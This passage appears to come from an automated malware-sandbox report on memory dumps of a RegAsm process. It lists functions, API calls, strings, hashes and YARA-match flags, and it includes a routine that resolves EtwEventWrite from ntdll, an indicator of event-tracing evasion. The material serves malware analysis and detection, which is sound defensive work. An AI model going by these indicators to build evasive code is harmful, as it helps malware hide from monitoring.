Part of subcall function 6C084410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C0C3EBD,00000017,?,00000000,?,6C0C3EBD,?,?,6C0842D2), ref: 6C084444

Strings

profiler-paused, xrefs: 6C0D46E4
-%llu, xrefs: 6C0D4733
., xrefs: 6C0D476A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: c1684505640cc6ed75ef9942e436aee2d6a6592ccc8408f897885158123c1723
Instruction ID: e9e68061057df4250169a1b722c26158a259f63c238b839553ce9e84404cddde
Opcode Fuzzy Hash: c1684505640cc6ed75ef9942e436aee2d6a6592ccc8408f897885158123c1723
Instruction Fuzzy Hash: 41310771F043085BCB08CFADD89179EBBE6DB89314F15853EE815ABB41EB74A9448B90

Function 6C0DB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C084290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C0C3EBD,6C0C3EBD,00000000), ref: 6C0842A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C0DB127), ref: 6C0DB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0DB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C0DB4E4

Strings

pid:, xrefs: 6C0DB4DE

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 6a368f91f2f6dfb3d28d0aa7519f326cc9a84f6e10da53d66f8998a53cd606c9
Instruction ID: 11f32a9945d9fa79d16ebe19efdc2faf8368939c83ddc05f9701f69dcbf42692
Opcode Fuzzy Hash: 6a368f91f2f6dfb3d28d0aa7519f326cc9a84f6e10da53d66f8998a53cd606c9
Instruction Fuzzy Hash: 8E31F031A013089BDB10DFA9D880BEEB7F5FF09319F550529D91167A41DB31F949CBA1

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48

Function 00413390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004133AF
StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 004133E8

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

strtok_s.MSVCRT ref: 00413424

Strings

"xA, xrefs: 004133A1, 004133A4

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: "xA
API String ID: 348468850-582338916
Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98

Function 6C08F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C0FD020), ref: 6C08F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C08F132

Strings

shell32, xrefs: 6C08F11D
SHGetKnownFolderPath, xrefs: 6C08F12C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 5252e15c57670648ae182d2bfd5c0f557a4f18eb2315f1583e56f9a1e56f80a0
Instruction ID: a7f1c520f7d43d1c5defcd680e4bc9569e40c97e92acf061552360ab27ccc34c
Opcode Fuzzy Hash: 5252e15c57670648ae182d2bfd5c0f557a4f18eb2315f1583e56f9a1e56f80a0
Instruction Fuzzy Hash: 8F010C717012159FDF00DF75D848A5B7BF8FF4AA94B50451CE849E7640DB30AA04DBA0

Function 6C0CE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0CE577
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CE584
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C0CE8A6

Strings

MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C0CE655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C0CE826, 6C0CE850
MOZ_PROFILER_STARTUP, xrefs: 6C0CE5A1, 6C0CE5CC, 6C0CE5FF, 6C0CE62A
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C0CE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C0CE722, 6C0CE750, 6C0CE7A2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 243b03deb4e15605a59fe1f98e46c2d24850d22cb43d02b79f4bb2d7b1833ae1
Instruction ID: 448d1032f308f3541d01e1929de540791bd6cb4ba7d8348d9fca477a066be7b9
Opcode Fuzzy Hash: 243b03deb4e15605a59fe1f98e46c2d24850d22cb43d02b79f4bb2d7b1833ae1
Instruction Fuzzy Hash: 3D118E31B04258DFCB009F14C48AB69BBF4FB89328F10061DE86597650CB74A804DB95

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Strings

invalid string position, xrefs: 0040F288
string too long, xrefs: 0040F27D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction ID: e6539817a9f8634559db26b0b382dc9566da10c2029d1fc652b1cb6cacdddcbf
Opcode Fuzzy Hash: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction Fuzzy Hash: 55D012B5A4020C7BCB04E79AE816ACDBAE99B58714F20016FB616D3641EAB8A6004569

Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
HeapAlloc.KERNEL32(00000000), ref: 00411D73
wsprintfW.USER32 ref: 00411D84

Strings

%hs, xrefs: 00411D7E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction ID: 9bbdd1ee4896165f6ac39e3e5efd8c25d27bca58a6bb0b57e2a538c7cae0429d
Opcode Fuzzy Hash: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction Fuzzy Hash: C9D012353C030477E1781B50BC5FF1A2934D7C5F02F201124F312580D046A41402963E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

EtwEventWrite, xrefs: 004018C5
ntdll.dll, xrefs: 004018B5

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction ID: fa0301676ac4a0b35d6f0bad7f9db5a069fcd374a286a1e4a3065c0da922a8bc
Opcode Fuzzy Hash: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction Fuzzy Hash: 84B09B7078020097CD1467756D5DF07766566457027506165A645D0160D77C5514551D

Function 6C092272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C09237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C092B9C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 9c093451c1806d68e22981b64437e71a4ec997d2eee9507dc8f27b3fe1f9398f
Instruction ID: 3357d14a72f6f1e56602bba6e3c3104b0733fe992fe67a9c9ccc48417e4f2fcc
Opcode Fuzzy Hash: 9c093451c1806d68e22981b64437e71a4ec997d2eee9507dc8f27b3fe1f9398f
Instruction Fuzzy Hash: E8E18C71A002069FDB08CF59C8D4B9EBBF2BF88314F199168E9099B745D771EC85DB90

Function 6C0D0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0D0CD5

Part of subcall function 6C0BF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0BF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0D0D40
free.MOZGLUE ref: 6C0D0DCB

Part of subcall function 6C0A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0A5EDB
Part of subcall function 6C0A5E90: memset.VCRUNTIME140(6C0E7765,000000E5,55CCCCCC), ref: 6C0A5F27
Part of subcall function 6C0A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0A5FB2

free.MOZGLUE ref: 6C0D0DDD
free.MOZGLUE ref: 6C0D0DF2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 1bcbcbb9103603b78beed808d4f341b4f996940e5d7e32915a38951c9bbee64e
Instruction ID: 8fb5d5ee98d0e1a4659dfb714650f60b9b0670aced5199c704a9fe49ccd8c422
Opcode Fuzzy Hash: 1bcbcbb9103603b78beed808d4f341b4f996940e5d7e32915a38951c9bbee64e
Instruction Fuzzy Hash: D8410775A0C7809BD720CF29C08079EFBE5BF89618F518A2EE8D887751D770A585CB92

Function 6C0D9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C0D8242,?,00000000,?,6C0CB63F), ref: 6C0D9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0D8242,?,00000000,?,6C0CB63F), ref: 6C0D91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C0D8242,?,00000000,?,6C0CB63F), ref: 6C0D91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0D8242,?,00000000,?,6C0CB63F), ref: 6C0D9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C0D8242,?,00000000,?,6C0CB63F), ref: 6C0D9219

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: cefe6bf978285e8b255ddb8ce4115af55711a16879742257457ca042fbefc7c4
Instruction ID: 280fcd0d33c8ea52c3f5e741e84e186a1017d40bb6fba041bfc866d5a722ec9c
Opcode Fuzzy Hash: cefe6bf978285e8b255ddb8ce4115af55711a16879742257457ca042fbefc7c4
Instruction Fuzzy Hash: B0312131A007058BEB10DF68DC5476A73E9EF81314F524629D85BD7640EF30E845CBA2

Function 6C0C0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E7DC), ref: 6C0C0838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0C084C
EnterCriticalSection.KERNEL32(?), ref: 6C0C08AF
LeaveCriticalSection.KERNEL32(?), ref: 6C0C08BD
LeaveCriticalSection.KERNEL32(6C10E7DC), ref: 6C0C08D5

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 6db37f1301683bd3978fbb66a3d35ae86bb7de14dabd7fe767ed45cc0ef0db7d
Instruction ID: 6295c7f9565e0c83b3d3ab9fa7499c485ba9cfc12e24bc62d6d12b54484eefb1
Opcode Fuzzy Hash: 6db37f1301683bd3978fbb66a3d35ae86bb7de14dabd7fe767ed45cc0ef0db7d
Instruction Fuzzy Hash: A821C57170920A8BEB04DF65D888BAE77F9AF4570DF50452CD549A7640DF32A508CBD1

Function 6C0DCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C0CDA31,00100000,?,?,00000000,?), ref: 6C0DCDA4

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

Part of subcall function 6C0DD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C0DCDBA,00100000,?,00000000,?,6C0CDA31,00100000,?,?,00000000,?), ref: 6C0DD158
Part of subcall function 6C0DD130: InitializeConditionVariable.KERNEL32(00000098,?,6C0DCDBA,00100000,?,00000000,?,6C0CDA31,00100000,?,?,00000000,?), ref: 6C0DD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C0CDA31,00100000,?,?,00000000,?), ref: 6C0DCDC4

Part of subcall function 6C0D7480: ReleaseSRWLockExclusive.KERNEL32(?,6C0E15FC,?,?,?,?,6C0E15FC,?), ref: 6C0D74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C0CDA31,00100000,?,?,00000000,?), ref: 6C0DCECC

Part of subcall function 6C09CA10: mozalloc_abort.MOZGLUE(?), ref: 6C09CAA2

Part of subcall function 6C0CCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C0DCEEA,?,?,?,?,00000000,?,6C0CDA31,00100000,?,?,00000000), ref: 6C0CCB57
Part of subcall function 6C0CCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C0CCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C0DCEEA,?,?), ref: 6C0CCBAF

